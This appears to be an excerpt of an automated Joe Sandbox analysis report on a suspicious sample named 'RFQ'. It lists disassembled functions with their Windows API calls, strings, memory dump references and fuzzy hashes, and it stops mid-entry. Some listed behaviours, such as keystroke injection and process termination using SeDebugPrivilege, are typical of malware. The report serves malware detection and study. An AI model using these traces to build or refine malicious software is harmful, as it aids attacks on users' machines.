                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 337547030-0
                                                                            • Opcode ID: 985a0b215a03f484913e130367b573316b0f69eabed64c6add14aeb623a90d0b
                                                                            • Instruction ID: 0de334c49c5f30756eeb0f5579ded56d8a74d265c058d87399473ccece89c6cd
                                                                            • Opcode Fuzzy Hash: 985a0b215a03f484913e130367b573316b0f69eabed64c6add14aeb623a90d0b
                                                                            • Instruction Fuzzy Hash: CB31907110070DAFDB219FA8CD44AB6BBFAFF05320B04851DF65683651C735D825EB64
                                                                            Function 006E24E6 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 006E399F
                                                                              • Part of subcall function 006E3985: GetCurrentThreadId.KERNEL32 ref: 006E39A6
                                                                              • Part of subcall function 006E3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006E24F7), ref: 006E39AD
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E2501
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006E251F
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 006E2523
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E252D
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006E2545
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 006E2549
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E2553
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006E2567
                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 006E256B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 953c9f9433e1da6a15e6f7ad27f98a52c9863832d6ee3e73faf6ec07aee84698
                                                                            • Instruction ID: f6190287bc780fb96869773083ce8d8b85f287e07696e1af1008e3d92f7d64ac
                                                                            • Opcode Fuzzy Hash: 953c9f9433e1da6a15e6f7ad27f98a52c9863832d6ee3e73faf6ec07aee84698
                                                                            • Instruction Fuzzy Hash: E301B5303D0314BBFB1067A99C8AF957E5ADB8AB12F108055F314AF1D1C9E218449A6D
                                                                            Function 006E1747 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,006E138D,?,?,00000000), ref: 006E1750
                                                                            • HeapAlloc.KERNEL32(00000000,?,006E138D,?,?,00000000), ref: 006E1757
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006E138D,?,?,00000000), ref: 006E176C
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,006E138D,?,?,00000000), ref: 006E1774
                                                                            • DuplicateHandle.KERNEL32(00000000,?,006E138D,?,?,00000000), ref: 006E1777
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006E138D,?,?,00000000), ref: 006E1787
                                                                            • GetCurrentProcess.KERNEL32(006E138D,00000000,?,006E138D,?,?,00000000), ref: 006E178F
                                                                            • DuplicateHandle.KERNEL32(00000000,?,006E138D,?,?,00000000), ref: 006E1792
                                                                            • CreateThread.KERNEL32(00000000,00000000,006E17B8,00000000,00000000,00000000), ref: 006E17AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: c1b37e1cc146175a63b93a4adafb6a1bf97d2ed8004bcdb48695bada98eb19b6
                                                                            • Instruction ID: 26dbcfc0384558d3de55f1d0205275b3362b9e5f041c29ff2146df38bf813489
                                                                            • Opcode Fuzzy Hash: c1b37e1cc146175a63b93a4adafb6a1bf97d2ed8004bcdb48695bada98eb19b6
                                                                            • Instruction Fuzzy Hash: 7401ACB52C0348BFE711ABA9DC49FA77BADEB89B11F01C411FA05DB191C67498009B64
                                                                            Function 0070444A Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 262COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$pt
                                                                            • API String ID: 2610073882-758650727
                                                                            • Opcode ID: b474027cad668c6506fbb212e498666b6570586d3044f776d498db3c53864f60
                                                                            • Instruction ID: 4cb63beff3e35a45f909ddf8de691adcd870b4620e46e2823daf4044fe88ca7f
                                                                            • Opcode Fuzzy Hash: b474027cad668c6506fbb212e498666b6570586d3044f776d498db3c53864f60
                                                                            • Instruction Fuzzy Hash: 03919EB1A00219EBDF24CFA5C844FAEBBF8EF45714F108659F615AB180E7789944CF64
                                                                            Function 0070A009 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006ED3FA: CreateToolhelp32Snapshot.KERNEL32 ref: 006ED41F
                                                                              • Part of subcall function 006ED3FA: Process32FirstW.KERNEL32(00000000,?), ref: 006ED42D
                                                                              • Part of subcall function 006ED3FA: CloseHandle.KERNEL32(00000000), ref: 006ED4FA
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070A094
                                                                            • GetLastError.KERNEL32 ref: 0070A0A7
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070A0DA
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0070A18F
                                                                            • GetLastError.KERNEL32(00000000), ref: 0070A19A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070A1EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: 2babbacbe9c4503b82b6890b91be24c8660424a898a767f2e5095a81da7cb4b5
                                                                            • Instruction ID: 723cb1cedbf9227347a89e772973b79254a9883efbaf8e0ee415a64653bcd4a7
                                                                            • Opcode Fuzzy Hash: 2babbacbe9c4503b82b6890b91be24c8660424a898a767f2e5095a81da7cb4b5
                                                                            • Instruction Fuzzy Hash: 8C616C71208341AFD720DF18C894F19BBE1AF54318F18859CE4668B7E2C77AED45CB96
                                                                            Function 007137B9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00713858
                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0071386D
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00713887
                                                                            • _wcslen.LIBCMT ref: 007138CC
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 007138F9
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00713927
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcslen
                                                                            • String ID: SysListView32
                                                                            • API String ID: 2147712094-78025650
                                                                            • Opcode ID: b5a80595bba0125cda6b9c0a638e64c34898bc56c0a893aa4d724ac5b9e2704a
                                                                            • Instruction ID: 6f12bbfdf353537ab2a98893f41e5a895570d59e461cb854081df065396f3688
                                                                            • Opcode Fuzzy Hash: b5a80595bba0125cda6b9c0a638e64c34898bc56c0a893aa4d724ac5b9e2704a
                                                                            • Instruction Fuzzy Hash: E541C571900219ABEB219F68CC49FEA7BA9FF08350F104525F958E72C1D779ED84CB90
                                                                            Function 006EBB7C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006EBC1B
                                                                            • IsMenu.USER32(00000000), ref: 006EBC3B
                                                                            • CreatePopupMenu.USER32 ref: 006EBC71
                                                                            • GetMenuItemCount.USER32(01355870), ref: 006EBCC2
                                                                            • InsertMenuItemW.USER32(01355870,?,00000001,00000030), ref: 006EBCEA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                            • String ID: 0$2
                                                                            • API String ID: 93392585-3793063076
                                                                            • Opcode ID: 77e17db8bc1bd91d4f462b4741b11cacb8ad7c9d2b564e2e53a4838a6d469423
                                                                            • Instruction ID: 592472379a13f64a36775ddfe4c19020deeca6e29305e90706455326f51c7197
                                                                            • Opcode Fuzzy Hash: 77e17db8bc1bd91d4f462b4741b11cacb8ad7c9d2b564e2e53a4838a6d469423
                                                                            • Instruction Fuzzy Hash: D151D0705063899BDF21CF6AD884BEFBBF6AF44714F249119E801D7290EB709945CB61
                                                                            Function 006EC792 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 006EC831
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            • Opcode ID: fc63ffc5d2a232078bc43dddfd928e881257d09c41408d2ce288fdb1a22fda48
                                                                            • Instruction ID: 58193ab2ab2bcd5631072213840f027bd0a229f143e7a43a195a2d3293a75f7e
                                                                            • Opcode Fuzzy Hash: fc63ffc5d2a232078bc43dddfd928e881257d09c41408d2ce288fdb1a22fda48
                                                                            • Instruction Fuzzy Hash: F2112B7164A3467AE7015A559C82DEF2FDD9F16334B20003DF901A53C2E7E46D03456D
                                                                            Function 006EDD45 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 642191829-3771769585
                                                                            • Opcode ID: b3cffce7eb7797c6746ae79a8fd4889b5bdc4c9b9ce745ade56822f5574b7fbc
                                                                            • Instruction ID: 22f8d05b593fc290be427432380b2de51187c1e31b07c9a9f1b788ec1a67072e
                                                                            • Opcode Fuzzy Hash: b3cffce7eb7797c6746ae79a8fd4889b5bdc4c9b9ce745ade56822f5574b7fbc
                                                                            • Instruction Fuzzy Hash: 8B11E172900214AFDB61BBA9DC4AEEF37BDDF42310F004069F005A60D2EFB48E818B64
                                                                            Function 006EEC37 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$LocalTime
                                                                            • String ID:
                                                                            • API String ID: 952045576-0
                                                                            • Opcode ID: be594d5ee26ca5c9da6fc3289d970b4a8368299c6c55862f1b0a8c05c667f214
                                                                            • Instruction ID: 2efbc6734c0420eaa21c2943d4dcc2a626467fbcad341193d44db7bb5681c585
                                                                            • Opcode Fuzzy Hash: be594d5ee26ca5c9da6fc3289d970b4a8368299c6c55862f1b0a8c05c667f214
                                                                            • Instruction Fuzzy Hash: ED419065C1125475CB51FBF4CC4AACFB7AAAF06300F50846AF518E3162FA34E741C7A9
                                                                            Function 0069EEF7 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006DEEDF,00000004,00000000,00000000), ref: 0069EF72
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,006DEEDF,00000004,00000000,00000000), ref: 006DF0EE
                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006DEEDF,00000004,00000000,00000000), ref: 006DF171
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: ac44ecd3ecba62438045f25668b407009c9836a146d801cc4ed37be5e93e0a5b
                                                                            • Instruction ID: de4b58a08dca6b0fea82b0894988bf8cc18a3238b31a01f54f63272a718e00b8
                                                                            • Opcode Fuzzy Hash: ac44ecd3ecba62438045f25668b407009c9836a146d801cc4ed37be5e93e0a5b
                                                                            • Instruction Fuzzy Hash: 2641D431608680EADF35CB2DCC987EA7BABEB45310F18851FE04746FA1C677A881CB51
                                                                            Function 00712C36 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00712C4E
                                                                            • GetDC.USER32(00000000), ref: 00712C56
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00712C61
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00712C6D
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00712CA9
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00712CBA
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0071599A,?,?,000000FF,00000000,?,000000FF,?), ref: 00712CF5
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00712D14
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 733fca665ed7fade9b7e10656753ff16ef9220495f049ed279a1f02a711c2bf7
                                                                            • Instruction ID: e3d85f0799b22176dfaecbf8e8525fd8ede61c750fbff1a80b73f5da37f8ae00
                                                                            • Opcode Fuzzy Hash: 733fca665ed7fade9b7e10656753ff16ef9220495f049ed279a1f02a711c2bf7
                                                                            • Instruction Fuzzy Hash: CC317F72241214BFEB118F58DC49FFB3BA9EF09711F048055FE489A1D1C6799851C7A8
                                                                            Function 006E5578 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: d2efb115d70b0cc34ea0b11fdbdf9374d916e554be403171daf85004ce7417ea
                                                                            • Instruction ID: 2866eeaafa23f51075b1e5f0b4fbd927d565b7f403a857d034b65449067da636
                                                                            • Opcode Fuzzy Hash: d2efb115d70b0cc34ea0b11fdbdf9374d916e554be403171daf85004ce7417ea
                                                                            • Instruction Fuzzy Hash: D221F5A1602B097BDB007A168D42FEF636F9F1239CF540024FD069A681E758EE11CAE5
                                                                            Function 00704ED5 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 3d01e63e4d1b6a2d06455616f868530ff84f9981cf0a74075653d8cca8472d42
                                                                            • Instruction ID: e2c3894e3d5712b41c147cebeed29682c668567db71202e85ab6c8b362d5cbb6
                                                                            • Opcode Fuzzy Hash: 3d01e63e4d1b6a2d06455616f868530ff84f9981cf0a74075653d8cca8472d42
                                                                            • Instruction Fuzzy Hash: 89D18EB5A0060ADFDF10CFA8C881AAEB7F5BF48314F148669E915AB281E775ED41CF50
                                                                            Function 006C14C2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(?,?), ref: 006C156E
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 006C15F1
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006C1684
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 006C169B
                                                                              • Part of subcall function 006B37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006C1717
                                                                            • __freea.LIBCMT ref: 006C1742
                                                                            • __freea.LIBCMT ref: 006C174E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                            • String ID:
                                                                            • API String ID: 2829977744-0
                                                                            • Opcode ID: 12ca2677c90889514164c460f38996236c59c1bf06af7bebe7d39948de97f80e
                                                                            • Instruction ID: 3949476c2072f0811ee6b909a44e8c62f3fa0aa4033b345fdde20b4f4f66b4a4
                                                                            • Opcode Fuzzy Hash: 12ca2677c90889514164c460f38996236c59c1bf06af7bebe7d39948de97f80e
                                                                            • Instruction Fuzzy Hash: 2F91B2B2E002199ADF218E64C841FFE7BA6DF47350F58455DE906EF242DB35DD418BA0
                                                                            Function 0069A910 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
